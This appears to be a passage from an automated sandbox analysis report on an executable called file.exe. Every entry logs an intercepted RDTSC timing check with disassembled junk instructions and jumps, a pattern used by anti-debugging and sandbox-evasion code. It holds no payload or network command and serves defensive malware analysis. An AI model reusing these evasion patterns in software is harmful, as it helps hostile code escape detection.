Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4B754 second address: C4B768 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F423D327E30h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4FE07 second address: C4FE1C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F423CC2AB21h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4FE1C second address: C4FE26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4FE26 second address: C4FE2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4FE2A second address: C4FE44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F423D327E2Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4FE44 second address: C4FE4A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4FF9A second address: C4FFA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4FFA0 second address: C4FFBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F423CC2AB27h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4FFBF second address: C4FFD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F423D327E32h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4FFD7 second address: C4FFEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F423CC2AB1Dh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4FFEB second address: C4FFFA instructions: 0x00000000 rdtsc 0x00000002 js 00007F423D327E26h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5012B second address: C5014A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F423CC2AB27h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5014A second address: C50150 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5043A second address: C50440 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C50440 second address: C50446 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C50446 second address: C5044C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5044C second address: C50462 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F423D327E31h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C50462 second address: C50479 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a je 00007F423CC2AB16h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C50479 second address: C504A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F423D327E2Fh 0x00000008 jnl 00007F423D327E26h 0x0000000e jmp 00007F423D327E30h 0x00000013 popad 0x00000014 push edi 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF638F second address: BF6393 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF6393 second address: BF6399 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF6399 second address: BF63A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F423CC2AB16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF6482 second address: BF6486 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C50797 second address: C507A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F423CC2AB16h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C508F3 second address: C50915 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F423D327E34h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F423D327E2Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5128B second address: C51293 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C51293 second address: C51297 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C51297 second address: C5129B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5129B second address: C512A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA7400 second address: BA741D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F423CC2AB28h 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA741D second address: BA742D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F423D327E26h 0x0000000a jg 00007F423D327E26h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA742D second address: BA7439 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C59C93 second address: C59CC7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F423D327E33h 0x00000008 pop ecx 0x00000009 jmp 00007F423D327E35h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C59CC7 second address: C59CDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F423CC2AB21h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C59CDC second address: C59CFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F423D327E39h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C57E7A second address: C57E86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007F423CC2AB16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C57E86 second address: C57E90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F423D327E26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C585D3 second address: C585DD instructions: 0x00000000 rdtsc 0x00000002 jne 00007F423CC2AB22h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5938C second address: C593A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F423D327E38h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C59970 second address: C59986 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F423CC2AB1Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C59986 second address: C5998B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5998B second address: C599A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F423CC2AB26h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB4CA5 second address: BB4CBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F423D327E34h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5FF65 second address: C5FF6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5FF6D second address: C5FF83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jns 00007F423D327E58h 0x0000000e jnl 00007F423D327E44h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5F09C second address: C5F0AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F423CC2AB1Dh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5F22B second address: C5F22F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5F4FD second address: C5F50D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F423CC2AB16h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5F50D second address: C5F511 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5F904 second address: C5F92D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F423CC2AB16h 0x0000000a jmp 00007F423CC2AB1Eh 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F423CC2AB1Ch 0x00000017 push edi 0x00000018 pop edi 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5F92D second address: C5F937 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5F937 second address: C5F952 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F423CC2AB27h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5F952 second address: C5F956 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5F956 second address: C5F960 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5FAA4 second address: C5FAA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5FAA8 second address: C5FAB2 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F423CC2AB16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5FC49 second address: C5FC5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F423D327E2Ah 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5FC5F second address: C5FC65 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5FC65 second address: C5FC90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F423D327E36h 0x00000009 jmp 00007F423D327E31h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5FC90 second address: C5FC94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5FC94 second address: C5FCAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jc 00007F423D327E26h 0x0000000d jng 00007F423D327E26h 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5FCAB second address: C5FCB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5FCB8 second address: C5FCC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C646DF second address: C646E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C646E3 second address: C646EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C646EC second address: C646F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C646F2 second address: C646F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C646F9 second address: C64701 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6BE8B second address: C6BE9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jg 00007F423D327E26h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6BE9A second address: C6BEAA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F423CC2AB1Ah 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6A69B second address: C6A6A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6A6A1 second address: C6A6A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6A952 second address: C6A958 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6AAFE second address: C6AB0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F423CC2AB16h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6AD6C second address: C6AD72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6AEED second address: C6AF0F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F423CC2AB28h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6AF0F second address: C6AF35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F423D327E39h 0x00000009 popad 0x0000000a jns 00007F423D327E28h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6AF35 second address: C6AF3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6AF3F second address: C6AF45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C69D4C second address: C69D53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6FD46 second address: C6FD4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C74943 second address: C74947 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C74947 second address: C74967 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F423D327E36h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C74967 second address: C7496E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C743D8 second address: C743DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C76CE6 second address: C76D03 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F423CC2AB23h 0x00000007 jg 00007F423CC2AB16h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8302D second address: C83031 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C83031 second address: C8303D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8303D second address: C83047 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F423D327E26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C83047 second address: C83062 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F423CC2AB21h 0x00000008 jp 00007F423CC2AB1Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C895E4 second address: C895E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C895E8 second address: C89617 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F423CC2AB27h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push ecx 0x0000000b jne 00007F423CC2AB18h 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 pop edi 0x00000015 jc 00007F423CC2AB16h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C891F1 second address: C8922A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F423D327E36h 0x00000009 pop edi 0x0000000a jmp 00007F423D327E38h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8922A second address: C8922E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8922E second address: C89232 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C97061 second address: C97067 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9FF38 second address: C9FF3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9FF3E second address: C9FF42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9FF42 second address: C9FF46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9FF46 second address: C9FFA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F423CC2AB29h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F423CC2AB22h 0x00000010 push eax 0x00000011 jmp 00007F423CC2AB21h 0x00000016 jmp 00007F423CC2AB1Eh 0x0000001b pop eax 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f jc 00007F423CC2AB1Eh 0x00000025 pushad 0x00000026 popad 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9FFA5 second address: C9FFA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA0229 second address: CA022D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA022D second address: CA0233 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA0233 second address: CA023F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F423CC2AB16h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA03B7 second address: CA03C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F423D327E2Ah 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
